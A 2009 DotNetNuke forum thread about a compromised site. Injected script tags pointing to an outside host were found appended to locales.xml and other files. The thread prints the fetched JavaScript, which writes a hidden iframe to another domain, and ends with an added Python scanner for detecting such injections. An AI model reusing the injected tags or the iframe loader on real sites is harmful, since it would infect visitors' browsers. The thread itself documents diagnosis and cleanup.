Wicket tough Server Error
New Post
5/28/2009 11:42 PM
 

OK, got tired of waiting for help.  I had a ticket sitting out @ Network Solutions for 3 days now with no results.  Every time I called, the engineering group was working on it and escalating it.  So I decided to take it upon myself to try and fix it......  (Word to the wise.. know what you are doing and if you don't, be patient and don't give up!!!)

The DNN site was at 4.8.4.  I read in some post that others were having a similar problem and they re-installed the version and everything started working.  So I decided to upgrade to 4.9.3  (I could not get 4.9.4 to download from the Downloads page).  Went through the process of copying the correct entries from the original web.config file to the new one to then upload.  Could not get the install to start up.  Instead caused a different error.. after 1/2 day of screwing around, I found out that I deleted the appsettings opening xml tag in the web.config file... Fixed that and the install ran.  This did not fix the problem.  Do not give up!!!  Customer hacked off so kept digging...  This thread mentioned a locale change to look at for the other user in this thread.  Not knowing too much about it I looked at the app_globalresources folder and the files in there and compared the list to the list in the install package.  I noticed that the website had a file called locales.xml and the install package did not.   I looked at a few of my other sites and noticed they also had this file.  There is not much in it so I backed it up and deleted it and ran the site to see what would happen.   Voila!!!!! The site came up and the locales.xml file was re-created.  Good News!!!

I went back to look at the newly created file and it was smaller than the one I deleted.  I looked at the "original" file I deleted and noticed something suspicious in the file.... See Below!

<?xml version="1.0" encoding="UTF-8" ?>
<root>
  <language name="English (United States)" key="en-US" fallback=""/>
</root>
<script src=http://eazypr.com/images/header.gif></script>
<script src=http://eazypr.com/images/header.gif></script>
<script src=http://eazypr.com/images/header.gif></script>

I proceeded (taking the bullet here for you....) to paste that code in my address bar to see what "image" would be displayed.  Instead of an image.... it displayed the following:

 

function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=rtsst;expires="+ Then.toGMTString()
window.status=' ';
document.write("<iframe src=\"http://j.winxyz.com/ww/om.htm\" width=0 height=0></ifame>");
}
}Get();

I decided to leave well enough alone and not track it any further.  Maybe someone can explain how entries like that would make their way into the locales.xml file in the DNN portal.

Site is back up and running!

Doug

 

 
New Post
5/29/2009 3:22 AM
 
ugh 

Doug,

there must be a vulnerability of the server, presumably outside DNN, e.g. a weak ftp password, abused by the hacker to alter files. I am not aware of any option from inside DNN to modify this file except the Host languages UI. Please check for any files on the server with about the same modification date. If you need support, please contact security@dotnetnuke.com.


Cheers from Germany,
Sebastian Leupold

 
New Post
5/31/2009 9:38 AM
 

Hi Sebastian,

Funny you should say that.  I went to modify a form a few minutes ago (form Master) and received the multiple line message in the event log. :(  Apparently all the XML files in the install were affected with this "worm".  Editing them now to remove the same three lines.   Will post more information as I come across it.

Thanks,

Doug

 

 
New Post
5/31/2009 11:26 AM
 

More bad news.... worm code was also injected into a slew of html and aspx files.  These, however, were "fixed" when I did a complete install of 4.9.3 over the top of 4.8.4 (the infected version).  This is a site running on a Server at Network Solutions.  I suspect that that server was hit by a virus.  The day the customer noticed an issue with the site, NS had a message on their phone support line saying that some servers were experiencing issues and some sites may be down for a bit.  I believe they were trying to recover what they could for customers.  They should have at the very least notified all domain owners that were on the affected servers if this in fact was the same issue I am dealing with.

 
New Post
6/1/2009 5:41 PM
 

 Doug

I found out that all our XML files have been compromised! It seems like there was a JavaScript code injection that added three random lines (links to some page) on every XML file in the DNN folder structure. Luckily I had the backup files on my computer so I replaced all the "infected" files and now the site is back to normal.

 

Hope that helps. Please post if the same issue happened to you.

Thanks,
Dren
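
The check Sebastian suggests and the pattern Doug and Dren describe, as an added example that is not part of any post above: it flags XML files that no longer parse (text after the closing root tag) and off-site script tags, then lists files modified around the same time as a known-altered file. The extension sets, function names and the sample tree are assumptions constructed for illustration; off-site script hits in markup files are a review list, since legitimate pages may load external scripts too.

```python
import os, re, tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# <script src=...> pointing off-site, quoted or unquoted like the lines in the thread.
SCRIPT_RE = re.compile(rb"<script[^>]*\bsrc\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)
XML_EXT = {".xml", ".resx", ".config"}   # assumption: XML-format files worth parsing
MARKUP_EXT = {".htm", ".html", ".aspx", ".ascx"}

def check_file(path):
    """Return findings for one file; an empty list means nothing was flagged."""
    data, ext, findings = path.read_bytes(), path.suffix.lower(), []
    if ext in XML_EXT:
        try:
            ET.fromstring(data)
        except ET.ParseError as exc:  # text after the root's closing tag lands here
            findings.append(f"not well-formed XML: {exc}")
    if ext in XML_EXT | MARKUP_EXT:
        findings += ["external script: " + m.group(1).decode("ascii", "replace")
                     for m in SCRIPT_RE.finditer(data)]
    return findings

def scan(root):
    """Map each flagged file (path relative to root) to its findings."""
    root = Path(root)
    hits = ((p, check_file(p)) for p in sorted(root.rglob("*")) if p.is_file())
    return {p.relative_to(root).as_posix(): f for p, f in hits if f}

def modified_near(root, reference, window_s=3600):
    """Files whose mtime is within window_s seconds of a known-altered file."""
    root = Path(root)
    t0 = (root / reference).stat().st_mtime
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if p.is_file() and abs(p.stat().st_mtime - t0) <= window_s)

def build_sample(root):
    """Constructed sample tree: one clean file, two altered within the same minute."""
    tag = b"<script src=http://injected.example/images/header.gif></script>\n"
    xml = b'<?xml version="1.0" encoding="UTF-8" ?>\n<root>\n  <language key="en-US"/>\n</root>\n'
    for name, body, mtime in [("clean.xml", xml, 1_000_000),
                              ("locales.xml", xml + tag * 3, 2_000_000),
                              ("Default.aspx", b"<html><body></body></html>\n" + tag, 2_000_030)]:
        (Path(root) / name).write_bytes(body)
        os.utime(Path(root) / name, (mtime, mtime))
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        print(scan(build_sample(d)), modified_near(d, "locales.xml"))
```

Run `scan()` against a downloaded copy of the site rather than the live folder, and compare flagged files with the matching install package or a known-good backup before replacing them.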

 